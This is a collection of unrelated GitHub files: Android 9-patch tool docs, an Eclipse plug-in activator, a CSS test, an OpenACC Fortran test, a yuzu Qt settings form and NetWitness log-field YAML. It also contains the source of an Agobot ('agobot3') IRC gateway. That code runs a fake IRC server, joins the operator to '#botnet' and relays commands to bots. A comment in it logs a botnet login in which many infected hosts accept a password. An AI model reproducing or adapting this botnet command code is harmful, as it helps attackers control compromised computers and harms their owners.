patches and (optional) content area. Right-click (or hold Shift and click, on Mac) to erase
previously drawn lines.
</li>
<li>When done, select <strong>File</strong> > <strong>Save 9-patch...</strong>
<p>Your image will be saved with the <code>.9.png</code> file name.</p>
</li>
</ol>
<p class="note"><strong>Note:</strong> A normal PNG file (<code>*.png</code>) will be
loaded with an empty one-pixel border added around the image, in which you can draw
the stretchable patches and content area.
A previously saved 9-patch file (<code>*.9.png</code>) will be loaded as-is,
with no drawing area added, because it already exists.</p>
<img src="{@docRoot}images/draw9patch-bad.png" style="float:right;clear:both" alt="" height="300" width="341"
/>
<p>Optional controls include:</p>
<ul>
<li><strong>Zoom</strong>: Adjust the zoom level of the graphic in the drawing area.</li>
<li><strong>Patch scale</strong>: Adjust the scale of the images in the preview area.</li>
<li><strong>Show lock</strong>: Visualize the non-drawable area of the graphic on mouse-over.</li>
<li><strong>Show patches</strong>: Preview the stretchable patches in the drawing area (pink is a
stretchable patch).</li>
<li><strong>Show content</strong>: Highlight the content area in the preview images
(purple is the area in which content is allowed).</li>
<li><strong>Show bad patches</strong>: Adds a red border around patch areas that may
produce artifacts in the graphic when stretched. Visual coherence of your stretched
image will be maintained if you eliminate all bad patches.</li>
<ul>
| {
"pile_set_name": "Github"
} |
package de.vogella.rcp.commands.enable;
import org.eclipse.jface.resource.ImageDescriptor;
import org.eclipse.ui.plugin.AbstractUIPlugin;
import org.osgi.framework.BundleContext;
/**
* The activator class controls the plug-in life cycle
*/
public class Activator extends AbstractUIPlugin {
// The plug-in ID
public static final String PLUGIN_ID = "de.vogella.rcp.commands.enable";
// The shared instance
private static Activator plugin;
/**
* The constructor
*/
public Activator() {
}
/*
* (non-Javadoc)
* @see org.eclipse.ui.plugin.AbstractUIPlugin#start(org.osgi.framework.BundleContext)
*/
public void start(BundleContext context) throws Exception {
super.start(context);
plugin = this;
}
/*
* (non-Javadoc)
* @see org.eclipse.ui.plugin.AbstractUIPlugin#stop(org.osgi.framework.BundleContext)
*/
public void stop(BundleContext context) throws Exception {
plugin = null;
super.stop(context);
}
/**
* Returns the shared instance
*
* @return the shared instance
*/
public static Activator getDefault() {
return plugin;
}
/**
* Returns an image descriptor for the image file at the given
* plug-in relative path
*
* @param path the path
* @return the image descriptor
*/
public static ImageDescriptor getImageDescriptor(String path) {
return imageDescriptorFromPlugin(PLUGIN_ID, path);
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CSS Test: First-letter with the 'right white curly bracket' punctuation character</title>
<link rel="author" title="Microsoft" href="http://www.microsoft.com/" />
<link rel="help" href="http://www.w3.org/TR/CSS21/selector.html#first-letter" />
<link rel="match" href="first-letter-punctuation-023-ref.xht" />
<meta name="flags" content="" />
<meta name="assert" content="Punctuation characters defined in Unicode [UNICODE] in (Ps),(Pe),(Pi),(Pf) and (Po) punctuation classes that precede or follow the first letter are included in first-letter selection - 'right white curly bracket'." />
<style type="text/css">
div:first-letter
{
color: green;
font-size: 36px;
line-height: 2;
}
</style>
</head>
<body>
<p>Test passes if the "T" and surrounding punctuation below are green.</p>
<div>⦄T⦄est</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
#include "main.h"
#include "mainctrl.h"
#include "utility.h"
#include "ircgate.h"
/*
NICK Ago
USER Ago ago irc.secsup.uu.net :Ago
NOTICE AUTH :*** Looking up your hostname...
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** Found your hostname
:irc.secsup.org 001 Ago :Welcome to the Internet Relay Network Ago
:irc.secsup.org 002 Ago :Your host is irc.secsup.org[63.98.19.242/6667], running version 2.8/hybrid-6.3.1
NOTICE Ago :*** Your host is irc.secsup.org[63.98.19.242/6667], running version 2.8/hybrid-6.3.1
:irc.secsup.org 003 Ago :This server was created Tue Jan 21 2003 at 16:57:32 GMT
:irc.secsup.org 004 Ago irc.secsup.org 2.8/hybrid-6.3.1 oOiwszcrkfydnxb biklmnopstve
:irc.secsup.org 005 Ago WALLCHOPS PREFIX=(ov)@+ CHANTYPES=#& MAXCHANNELS=100 MAXBANS=25 NICKLEN=9 TOPICLEN=120 KICKLEN=90 NETWORK=EFnet CHANMODES=b,k,l,imnpst KNOCK MODES=4 :are supported by this server
:irc.secsup.org 251 Ago :There are 5968 users and 105973 invisible on 57 servers
:irc.secsup.org 252 Ago 434 :IRC Operators online
:irc.secsup.org 254 Ago 43934 :channels formed
:irc.secsup.org 255 Ago :I have 2919 clients and 1 servers
:irc.secsup.org 265 Ago :Current local users: 2919 Max: 4026
:irc.secsup.org 266 Ago :Current global users: 111941 Max: 125618
:irc.secsup.org 250 Ago :Highest connection count: 4027 (4026 clients) (151553 since server was (re)started)
:irc.secsup.org 375 Ago :- irc.secsup.org Message of the Day -
:irc.secsup.org 372 Ago :- This is a server
:irc.secsup.org 372 Ago :- like many others
:irc.secsup.org 372 Ago :- it is serving
:irc.secsup.org 372 Ago :-
:irc.secsup.org 372 Ago :- please don't abuse it
:irc.secsup.org 372 Ago :- or I will be mad
:irc.secsup.org 376 Ago :End of /MOTD command.
:Ago MODE Ago :+i
JOIN #bla
:irc.secsup.org 475 Ago #bla :Cannot join channel (+k)
JOIN #bla0r
:[email protected] JOIN :#bla0r
:irc.secsup.org MODE #bla0r +nt
:irc.secsup.org 353 Ago = #bla0r :@Ago
:irc.secsup.org 366 Ago #bla0r :End of /NAMES list.
MODE #bla0r
WHO #bla0r
:irc.secsup.org 324 Ago #bla0r +tn
:irc.secsup.org 329 Ago #bla0r 1059462330
:irc.secsup.org 352 Ago #bla0r ~Ago frb9-d9bb4a80.pool.mediaWays.net irc.secsup.org Ago H@ :0 Ago
:irc.secsup.org 315 Ago #bla0r :End of /WHO list.
PART #bla0r :Client exiting
:[email protected] PART #bla0r
PRIVMSG #bla0r :.login Ago bunghole
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago]pdak!~woinggg@CPE00e018f32af5-CM014400121364.cpe.net.cable.rogers.com PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
*/
CIRCGate::CIRCGate() { m_bRunning=true; m_sListenSock=-1; m_sServerSock=-1; }
CIRCGate::~CIRCGate() throw() { m_bRunning=false; if(m_sListenSock!=-1) xClose(m_sListenSock); if(m_sServerSock!=-1) xClose(m_sServerSock); }
void CIRCGate::run() throw()
{ // Create the shared listen socket on IRC port
sockaddr_in issin; memset(&issin, 0, sizeof(issin)); issin.sin_family=AF_INET;
issin.sin_addr.s_addr=INADDR_ANY; issin.sin_port=htons(6667);
m_sListenSock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(m_sListenSock!=-1) {
#ifdef WIN32
WSAAsyncSelect(m_sListenSock, 0, WM_USER + 1, FD_READ);
#endif
bind(m_sListenSock, (sockaddr *)&issin, sizeof(issin)); listen(m_sListenSock, 10); }
else // Uuhhh, spew something
{ g_cMainCtrl.m_cConsDbg.Log(1, "CIRCGate(0x%8.8Xh): Port %d is already bound, or something wicked happened!\n", this, 6667);
m_bRunning=false; return; }
while(m_bRunning)
{ // Accept an incoming connection from the shared listen socket
sockaddr_in cssin; socklen_t cssin_len=sizeof(cssin);
m_sServerSock=accept(m_sListenSock, (sockaddr *)&cssin, &cssin_len);
if(m_sServerSock!=-1) // We got a client
{ // Get the remote ip via getpeername, and store it in m_sClientIp
sockaddr sa; socklen_t sas=sizeof(sa); memset(&sa, 0, sizeof(sa)); getpeername(m_sServerSock, &sa, &sas);
char szTemp[32]; sprintf(szTemp, "%d.%d.%d.%d", (unsigned char)sa.sa_data[2], (unsigned char)sa.sa_data[3], \
(unsigned char)sa.sa_data[4], (unsigned char)sa.sa_data[5]);
m_sClientIp.Assign(szTemp); g_cMainCtrl.m_cConsDbg.Log(3, "CIRCGate(0x%8.8Xh): Connection from \"%s\" accepted!\n", this, m_sClientIp.CStr());
IRCLoop(); xClose(m_sServerSock); } }
if(m_sListenSock!=-1) xClose(m_sListenSock); }
bool CIRCGate::RecvLine(int sSocket, char *szBuffer, int iBufSize)
{ int iBufIndex=0; szBuffer[iBufIndex]='\0'; bool bReceiving=true;
while(iBufIndex<iBufSize && &szBuffer[iBufIndex] && bReceiving)
{ int iRead=xRead(sSocket, &szBuffer[iBufIndex], 1);
if(!iRead || iRead==-1) return false; szBuffer[iBufIndex+1]='\0';
if(szBuffer[iBufIndex]=='\n' || !szBuffer[iBufIndex]) bReceiving=false;
iBufIndex++; }
szBuffer[iBufSize-1]='\0'; szBuffer[iBufIndex-2]='\0'; return true; }
void CIRCGate::IRCLoop()
{ CString sWelcome, sAutojoin;
// NICK
char szTemp[4096]; m_bRunning=RecvLine(m_sServerSock, szTemp, sizeof(szTemp));
CTokenizer tok(szTemp, " \r\n"); tok.Next(m_sClientNick); tok.Next(m_sClientNick);
// USER
m_bRunning=RecvLine(m_sServerSock, szTemp, sizeof(szTemp));
sWelcome.Format(":irc.evil.org 001 %s :Welcome to the Internet Relay Network %s\r\n",
m_sClientNick.CStr(), m_sClientNick.CStr());
xWrite(m_sServerSock, sWelcome.CStr(), sWelcome.GetLength());
sWelcome.Format(":irc.evil.org 002 %s :Your host is irc.evil.org[127.0.0.1/6667], running version agobot3\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sWelcome.CStr(), sWelcome.GetLength());
sAutojoin.Format(":%[email protected] JOIN :#botnet\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
sAutojoin.Format(":irc.evil.org MODE #botnet +smtn\r\n");
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
sAutojoin.Format(":irc.evil.org 353 %s = #botnet :@%s\r\n", m_sClientNick.CStr(), m_sClientNick.CStr());
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
sAutojoin.Format(":irc.evil.org 366 %s #botnet :End of /NAMES list.\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
while(m_bRunning)
{ m_bRunning=RecvLine(m_sServerSock, szTemp, sizeof(szTemp));
CString sReply, sRecv; sRecv.Assign(szTemp);
char *szTokens[256]; szTokens[0]=strtok(szTemp, " ");
for(int i=1;i<256;i++) szTokens[i]=strtok(NULL, " ");
if(!strcmp(szTokens[0], "MODE"))
{ sReply.Format(":irc.evil.org 324 %s #botnet +smtn\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength());
sReply.Format(":irc.evil.org 329 %s #botnet 1059462330\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength()); }
else if(!strcmp(szTokens[0], "WHO"))
{ sReply.Format(":irc.evil.org 352 %s #botnet ~none anon.ip irc.evil.org %s H@ :0 %s\r\n", m_sClientNick.CStr(), m_sClientNick.CStr(), m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength());
sReply.Format(":irc.evil.org 315 %s #botnet :End of /WHO list.\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength()); }
else if(!strcmp(szTokens[0], "PRIVMSG"))
{ char *szText=strstr(sRecv.CStr(), ":"); szText+=1;
Send(szText, strlen(szText)); }
else
g_cMainCtrl.m_cConsDbg.Log(1, "CIRCGate(0x%8.8Xh): Got \"%s\"\n", this, szTemp);
}
}
void CIRCGate::Recv(char *szData, int iDataLen, message *pMsg)
{ CString sMsgBuf;
if(strstr(pMsg->szParams, g_cMainCtrl.m_sUniqueId.CStr()))
sMsgBuf.Format(":%[email protected] PRIVMSG #botnet :%s\r\n", m_sClientNick.CStr(), szData);
else
sMsgBuf.Format(":%[email protected] PRIVMSG #botnet :%s\r\n", (char*)(strstr(pMsg->szParams, ":"))+1, szData);
xWrite(m_sServerSock, sMsgBuf.CStr(), sMsgBuf.GetLength()); }
| {
"pile_set_name": "Github"
} |
! { dg-do run }
program asyncwait
integer, parameter :: N = 64
real, allocatable :: a(:), b(:), c(:)
integer i
allocate (a(N))
allocate (b(N))
allocate (c(N))
!$acc parallel async (0)
!$acc loop
do i = 1, N
a(i) = 1
end do
!$acc end parallel
!$acc parallel async (1)
!$acc loop
do i = 1, N
b(i) = 1
end do
!$acc end parallel
!$acc parallel wait (0, 1)
!$acc loop
do i = 1, N
c(i) = a(i) + b(i)
end do
!$acc end parallel
do i = 1, N
if (c(i) .ne. 2.0) STOP 1
end do
!$acc kernels async (0)
!$acc loop
do i = 1, N
a(i) = 1
end do
!$acc end kernels
!$acc kernels async (1)
!$acc loop
do i = 1, N
b(i) = 1
end do
!$acc end kernels
!$acc kernels wait (0, 1)
!$acc loop
do i = 1, N
c(i) = a(i) + b(i)
end do
!$acc end kernels
do i = 1, N
if (c(i) .ne. 2.0) STOP 2
end do
deallocate (a)
deallocate (b)
deallocate (c)
end program asyncwait
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>ConfigureWeb</class>
<widget class="QWidget" name="ConfigureWeb">
<property name="geometry">
<rect>
<x>0</x>
<y>0</y>
<width>926</width>
<height>561</height>
</rect>
</property>
<property name="windowTitle">
<string>Form</string>
</property>
<layout class="QVBoxLayout" name="verticalLayout">
<item>
<layout class="QVBoxLayout" name="verticalLayout_3">
<item>
<widget class="QGroupBox" name="groupBoxWebConfig">
<property name="title">
<string>yuzu Web Service</string>
</property>
<layout class="QVBoxLayout" name="verticalLayoutYuzuWebService">
<item>
<widget class="QLabel" name="web_credentials_disclaimer">
<property name="text">
<string>By providing your username and token, you agree to allow yuzu to collect additional usage data, which may include user identifying information.</string>
</property>
</widget>
</item>
<item>
<layout class="QGridLayout" name="gridLayoutYuzuUsername">
<item row="2" column="3">
<widget class="QPushButton" name="button_verify_login">
<property name="sizePolicy">
<sizepolicy hsizetype="Fixed" vsizetype="Fixed">
<horstretch>0</horstretch>
<verstretch>0</verstretch>
</sizepolicy>
</property>
<property name="layoutDirection">
<enum>Qt::RightToLeft</enum>
</property>
<property name="text">
<string>Verify</string>
</property>
</widget>
</item>
<item row="2" column="0">
<widget class="QLabel" name="web_signup_link">
<property name="text">
<string>Sign up</string>
</property>
</widget>
</item>
<item row="0" column="1" colspan="3">
<widget class="QLabel" name="username" />
</item>
<item row="1" column="0">
<widget class="QLabel" name="label_token">
<property name="text">
<string>Token: </string>
</property>
</widget>
</item>
<item row="1" column="4">
<widget class="QLabel" name="label_token_verified">
</widget>
</item>
<item row="0" column="0">
<widget class="QLabel" name="label_username">
<property name="text">
<string>Username: </string>
</property>
</widget>
</item>
<item row="1" column="1" colspan="3">
<widget class="QLineEdit" name="edit_token">
<property name="maxLength">
<number>80</number>
</property>
<property name="echoMode">
<enum>QLineEdit::Password</enum>
</property>
</widget>
</item>
<item row="2" column="1">
<widget class="QLabel" name="web_token_info_link">
<property name="text">
<string>What is my token?</string>
</property>
</widget>
</item>
<item row="2" column="2">
<spacer name="horizontalSpacer">
<property name="orientation">
<enum>Qt::Horizontal</enum>
</property>
<property name="sizeHint" stdset="0">
<size>
<width>40</width>
<height>20</height>
</size>
</property>
</spacer>
</item>
</layout>
</item>
</layout>
</widget>
</item>
<item>
<widget class="QGroupBox" name="groupBox">
<property name="title">
<string>Telemetry</string>
</property>
<layout class="QVBoxLayout" name="verticalLayout_2">
<item>
<widget class="QCheckBox" name="toggle_telemetry">
<property name="text">
<string>Share anonymous usage data with the yuzu team</string>
</property>
</widget>
</item>
<item>
<widget class="QLabel" name="telemetry_learn_more">
<property name="text">
<string>Learn more</string>
</property>
</widget>
</item>
<item>
<layout class="QGridLayout" name="gridLayoutTelemetryId">
<item row="0" column="0">
<widget class="QLabel" name="label_telemetry_id">
<property name="text">
<string>Telemetry ID:</string>
</property>
</widget>
</item>
<item row="0" column="1">
<widget class="QPushButton" name="button_regenerate_telemetry_id">
<property name="sizePolicy">
<sizepolicy hsizetype="Fixed" vsizetype="Fixed">
<horstretch>0</horstretch>
<verstretch>0</verstretch>
</sizepolicy>
</property>
<property name="layoutDirection">
<enum>Qt::RightToLeft</enum>
</property>
<property name="text">
<string>Regenerate</string>
</property>
</widget>
</item>
</layout>
</item>
</layout>
</widget>
</item>
</layout>
</item>
<item>
<widget class="QGroupBox" name="discord_group">
<property name="title">
<string>Discord Presence</string>
</property>
<layout class="QVBoxLayout" name="verticalLayout_21">
<item>
<widget class="QCheckBox" name="toggle_discordrpc">
<property name="text">
<string>Show Current Game in your Discord Status</string>
</property>
</widget>
</item>
</layout>
</widget>
</item>
<item>
<spacer name="verticalSpacer">
<property name="orientation">
<enum>Qt::Vertical</enum>
</property>
<property name="sizeHint" stdset="0">
<size>
<width>20</width>
<height>40</height>
</size>
</property>
</spacer>
</item>
</layout>
</widget>
<resources/>
<connections/>
</ui>
| {
"pile_set_name": "Github"
} |
- name: network.interface.name
overwrite: true
type: keyword
default_field: false
description: >
Name of the network interface where the traffic has been observed.
- name: rsa
overwrite: true
type: group
default_field: false
fields:
- name: internal
overwrite: true
type: group
fields:
- name: msg
overwrite: true
type: keyword
description: This key is used to capture the raw message that comes into the
Log Decoder
- name: messageid
overwrite: true
type: keyword
- name: event_desc
overwrite: true
type: keyword
- name: message
overwrite: true
type: keyword
description: This key captures the contents of instant messages
- name: time
overwrite: true
type: date
description: This is the time at which a session hits a NetWitness Decoder.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness.
- name: level
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: msg_id
overwrite: true
type: keyword
description: This is the Message ID1 value that identifies the exact log parser
definition which parses a particular log session. This key should never be
used to parse Meta data from a session (Logs/Packets) Directly, this is a
Reserved key in NetWitness
- name: msg_vid
overwrite: true
type: keyword
description: This is the Message ID2 value that identifies the exact log parser
definition which parses a particular log session. This key should never be
used to parse Meta data from a session (Logs/Packets) Directly, this is a
Reserved key in NetWitness
- name: data
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: obj_server
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: obj_val
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: resource
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: obj_id
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: statement
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: audit_class
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: entry
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: hcode
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: inode
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: resource_class
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: dead
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: feed_desc
overwrite: true
type: keyword
description: This is used to capture the description of the feed. This key should
never be used to parse Meta data from a session (Logs/Packets) Directly, this
is a Reserved key in NetWitness
- name: feed_name
overwrite: true
type: keyword
description: This is used to capture the name of the feed. This key should never
be used to parse Meta data from a session (Logs/Packets) Directly, this is
a Reserved key in NetWitness
- name: cid
overwrite: true
type: keyword
description: This is the unique identifier used to identify a NetWitness Concentrator.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: device_class
overwrite: true
type: keyword
description: This is the Classification of the Log Event Source under a predefined
fixed set of Event Source Classifications. This key should never be used to
parse Meta data from a session (Logs/Packets) Directly, this is a Reserved
key in NetWitness
- name: device_group
overwrite: true
type: keyword
description: This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_host
overwrite: true
type: keyword
description: This is the Hostname of the log Event Source sending the logs to
NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_ip
overwrite: true
type: ip
description: This is the IPv4 address of the Log Event Source sending the logs
to NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_ipv6
overwrite: true
type: ip
description: This is the IPv6 address of the Log Event Source sending the logs
to NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_type
overwrite: true
type: keyword
description: This is the name of the log parser which parsed a given session.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: device_type_id
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: did
overwrite: true
type: keyword
description: This is the unique identifier used to identify a NetWitness Decoder.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: entropy_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the Meta Type can
be either UInt16 or Float32 based on the configuration
- name: entropy_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the Meta Type can
be either UInt16 or Float32 based on the configuration
- name: event_name
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: feed_category
overwrite: true
type: keyword
description: This is used to capture the category of the feed. This key should
never be used to parse Meta data from a session (Logs/Packets) Directly, this
is a Reserved key in NetWitness
- name: forward_ip
overwrite: true
type: ip
description: This key should be used to capture the IPV4 address of a relay
system which forwarded the events from the original system to NetWitness.
- name: forward_ipv6
overwrite: true
type: ip
description: This key is used to capture the IPV6 address of a relay system
which forwarded the events from the original system to NetWitness. This key
should never be used to parse Meta data from a session (Logs/Packets) Directly,
this is a Reserved key in NetWitness
- name: header_id
overwrite: true
type: keyword
description: This is the Header ID value that identifies the exact log parser
header definition that parses a particular log session. This key should never
be used to parse Meta data from a session (Logs/Packets) Directly, this is
a Reserved key in NetWitness
- name: lc_cid
overwrite: true
type: keyword
description: This is a unique Identifier of a Log Collector. This key should
never be used to parse Meta data from a session (Logs/Packets) Directly, this
is a Reserved key in NetWitness
- name: lc_ctime
overwrite: true
type: date
description: This is the time at which a log is collected in a NetWitness Log
Collector. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: mcb_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
request is simply which byte for each side (0 thru 255) was seen the most
- name: mcb_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
response is simply which byte for each side (0 thru 255) was seen the most
- name: mcbc_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
count is the number of times the most common byte (above) was seen in the
session streams
- name: mcbc_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
count is the number of times the most common byte (above) was seen in the
session streams
- name: medium
overwrite: true
type: long
description: "This key is used to identify if it\u2019s a log/packet session\
\ or Layer 2 Encapsulation Type. This key should never be used to parse Meta\
\ data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness.\
\ 32 = log, 33 = correlation session, < 32 is packet session"
- name: node_name
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: nwe_callback_id
overwrite: true
type: keyword
description: This key denotes that event is endpoint related
- name: parse_error
overwrite: true
type: keyword
description: This is a special key that stores any Meta key validation error
found while parsing a log session. This key should never be used to parse
Meta data from a session (Logs/Packets) Directly, this is a Reserved key in
NetWitness
- name: payload_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the payload size metrics
are the payload sizes of each session side at the time of parsing. However,
in order to keep
- name: payload_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the payload size metrics
are the payload sizes of each session side at the time of parsing. However,
in order to keep
- name: process_vid_dst
overwrite: true
type: keyword
description: Endpoint generates and uses a unique virtual ID to identify any
similar group of process. This ID represents the target process.
- name: process_vid_src
overwrite: true
type: keyword
description: Endpoint generates and uses a unique virtual ID to identify any
similar group of process. This ID represents the source process.
- name: rid
overwrite: true
type: long
description: This is a special ID of the Remote Session created by NetWitness
Decoder. This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: session_split
overwrite: true
type: keyword
description: This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: site
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: size
overwrite: true
type: long
description: This is the size of the session as seen by the NetWitness Decoder.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: sourcefile
overwrite: true
type: keyword
description: This is the name of the log file or PCAPs that can be imported
into NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: ubc_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, Unique byte count
is the number of unique bytes seen in each stream. 256 would mean all byte
values of 0 thru 255 were seen at least once
- name: ubc_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, Unique byte count
is the number of unique bytes seen in each stream. 256 would mean all byte
values of 0 thru 255 were seen at least once
- name: word
overwrite: true
type: keyword
description: This is used by the Word Parsing technology to capture the first
5 character of every word in an unparsed log
- name: time
overwrite: true
type: group
fields:
- name: event_time
overwrite: true
type: date
description: This key is used to capture the time mentioned in a raw session
that represents the actual time an event occured in a standard normalized
form
- name: duration_time
overwrite: true
type: double
description: This key is used to capture the normalized duration/lifetime in
seconds.
- name: event_time_str
overwrite: true
type: keyword
description: This key is used to capture the incomplete time mentioned in a
session as a string
- name: starttime
overwrite: true
type: date
description: This key is used to capture the Start time mentioned in a session
in a standard form
- name: month
overwrite: true
type: keyword
- name: day
overwrite: true
type: keyword
- name: endtime
overwrite: true
type: date
description: This key is used to capture the End time mentioned in a session
in a standard form
- name: timezone
overwrite: true
type: keyword
description: This key is used to capture the timezone of the Event Time
- name: duration_str
overwrite: true
type: keyword
description: A text string version of the duration
- name: date
overwrite: true
type: keyword
- name: year
overwrite: true
type: keyword
- name: recorded_time
overwrite: true
type: date
description: The event time as recorded by the system the event is collected
from. The usage scenario is a multi-tier application where the management
layer of the system records it's own timestamp at the time of collection from
its child nodes. Must be in timestamp format.
- name: datetime
overwrite: true
type: keyword
- name: effective_time
overwrite: true
type: date
description: This key is the effective time referenced by an individual event
in a Standard Timestamp format
- name: expire_time
overwrite: true
type: date
description: This key is the timestamp that explicitly refers to an expiration.
- name: process_time
overwrite: true
type: keyword
description: Deprecated, use duration.time
- name: hour
overwrite: true
type: keyword
- name: min
overwrite: true
type: keyword
- name: timestamp
overwrite: true
type: keyword
- name: event_queue_time
overwrite: true
type: date
description: This key is the Time that the event was queued.
- name: p_time1
overwrite: true
type: keyword
- name: tzone
overwrite: true
type: keyword
- name: eventtime
overwrite: true
type: keyword
- name: gmtdate
overwrite: true
type: keyword
- name: gmttime
overwrite: true
type: keyword
- name: p_date
overwrite: true
type: keyword
- name: p_month
overwrite: true
type: keyword
- name: p_time
overwrite: true
type: keyword
- name: p_time2
overwrite: true
type: keyword
- name: p_year
overwrite: true
type: keyword
- name: expire_time_str
overwrite: true
type: keyword
description: This key is used to capture incomplete timestamp that explicitly
refers to an expiration.
- name: stamp
overwrite: true
type: date
description: Deprecated key defined only in table map.
- name: misc
overwrite: true
type: group
fields:
- name: action
overwrite: true
type: keyword
- name: result
overwrite: true
type: keyword
description: This key is used to capture the outcome/result string value of
an action in a session.
- name: severity
overwrite: true
type: keyword
description: This key is used to capture the severity given the session
- name: event_type
overwrite: true
type: keyword
description: This key captures the event category type as specified by the event
source.
- name: reference_id
overwrite: true
type: keyword
description: This key is used to capture an event id from the session directly
- name: version
overwrite: true
type: keyword
description: This key captures Version of the application or OS which is generating
the event.
- name: disposition
overwrite: true
type: keyword
description: This key captures the The end state of an action.
- name: result_code
overwrite: true
type: keyword
description: This key is used to capture the outcome/result numeric value of
an action in a session
- name: category
overwrite: true
type: keyword
description: This key is used to capture the category of an event given by the
vendor in the session
- name: obj_name
overwrite: true
type: keyword
description: This is used to capture name of object
- name: obj_type
overwrite: true
type: keyword
description: This is used to capture type of object
- name: event_source
overwrite: true
type: keyword
description: "This key captures Source of the event that\u2019s not a hostname"
- name: log_session_id
overwrite: true
type: keyword
description: This key is used to capture a sessionid from the session directly
- name: group
overwrite: true
type: keyword
description: This key captures the Group Name value
- name: policy_name
overwrite: true
type: keyword
description: This key is used to capture the Policy Name only.
- name: rule_name
overwrite: true
type: keyword
description: This key captures the Rule Name
- name: context
overwrite: true
type: keyword
description: This key captures Information which adds additional context to
the event.
- name: change_new
overwrite: true
type: keyword
description: "This key is used to capture the new values of the attribute that\u2019\
s changing in a session"
- name: space
overwrite: true
type: keyword
- name: client
overwrite: true
type: keyword
description: This key is used to capture only the name of the client application
requesting resources of the server. See the user.agent meta key for capture
of the specific user agent identifier or browser identification string.
- name: msgIdPart1
overwrite: true
type: keyword
- name: msgIdPart2
overwrite: true
type: keyword
- name: change_old
overwrite: true
type: keyword
description: "This key is used to capture the old value of the attribute that\u2019\
s changing in a session"
- name: operation_id
overwrite: true
type: keyword
description: An alert number or operation number. The values should be unique
and non-repeating.
- name: event_state
overwrite: true
type: keyword
description: This key captures the current state of the object/item referenced
within the event. Describing an on-going event.
- name: group_object
overwrite: true
type: keyword
description: This key captures a collection/grouping of entities. Specific usage
- name: node
overwrite: true
type: keyword
description: Common use case is the node name within a cluster. The cluster
name is reflected by the host name.
- name: rule
overwrite: true
type: keyword
description: This key captures the Rule number
- name: device_name
overwrite: true
type: keyword
description: 'This is used to capture name of the Device associated with the
